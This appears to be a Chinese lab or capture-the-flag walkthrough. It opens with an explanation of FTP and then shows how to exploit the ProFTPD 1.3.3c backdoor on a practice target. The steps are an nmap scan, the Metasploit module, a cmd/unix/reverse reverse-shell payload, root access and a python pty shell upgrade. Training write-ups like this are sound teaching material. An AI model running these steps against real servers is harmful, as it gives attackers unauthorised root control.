FTP(File Transfer Protocol,文件传输协议)是TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。
老规矩,扫描靶场IP,具体见之前的SSH秘钥泄露
nmap扫一下,发现开放了ftp服务,结合靶场的名字——FTP服务后门,复制版本号查一下有没有利用模块
第二个是msf的模块,因为长度问题没有完全显示。。。
打开msf,再查一下具体的利用模块,就是第四个
把那个模块的名字复制下来,然后看一下设置
use exploit/unix/ftp/proftpd_133c_backdoor
需要先设置payload,所以看一下具体有哪些,这里选择第三个
set payload cmd/unix/reverse
然后设置目标IP和攻击机IP
设置成功后开始攻击,直接就是root权限
在终端输入python -c "import pty;pty.spawn('/bin/bash')"
进行美化即可